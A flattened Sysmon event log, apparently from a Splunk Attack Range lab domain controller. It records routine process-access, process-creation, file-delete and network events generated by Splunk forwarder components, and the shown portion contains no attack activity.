12:11:06.900{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011555Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:06.900{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011554Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:06.900{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011553Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:06.900{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011552Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:06.900{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-66DA-6064-8601-00000000AE01}5228C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000011551Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:06.900{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-66DA-6064-8601-00000000AE01}5228C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000011550Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:06.902{266CAFBE-66DA-6064-8601-00000000AE01}5228C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000011549Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:06.526{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD331B01ADF607BF4A6271313A7FC633,SHA256=AB5E9FF257B76F648D496A15FB9AF39425223A4C827925E8F5FB8CE854401DCB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011548Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:06.479{266CAFBE-66DA-6064-8501-00000000AE01}68886872C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011547Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:06.322{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-66DA-6064-8501-00000000AE01}6888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011546Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:06.322{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011545Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:06.322{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011544Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:06.322{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011543Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:06.322{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011542Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:06.322{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-66DA-6064-8501-00000000AE01}6888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000011541Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:06.322{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-66DA-6064-8501-00000000AE01}6888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000011540Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:06.323{266CAFBE-66DA-6064-8501-00000000AE01}6888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000011569Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:07.807{266CAFBE-66DB-6064-8701-00000000AE01}13645200C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011568Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:07.650{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-66DB-6064-8701-00000000AE01}1364C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011567Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:07.650{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011566Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:07.650{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011565Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:07.650{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011564Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:07.650{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011563Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:07.650{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-66DB-6064-8701-00000000AE01}1364C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000011562Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:07.650{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-66DB-6064-8701-00000000AE01}1364C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000011561Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:07.651{266CAFBE-66DB-6064-8701-00000000AE01}1364C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000011560Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:07.541{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=604552C4951F1BADF8507C1808BB46ED,SHA256=8F365AD5AD364DA4B062D741F218CEC0136082C423FCEA3548CF3920F03CFD2D,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000011559Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:05.505{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53733-false10.0.1.12-8000- 10341000x800000000000000011558Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:07.057{266CAFBE-66DA-6064-8601-00000000AE01}5228992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000011570Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:08.557{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B110C21179750ABB7082547090BFBA10,SHA256=F222CFB5EEE976DE358926A83186E9439C955EFD145B3305D650F4A1E2752EAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011579Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:09.603{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 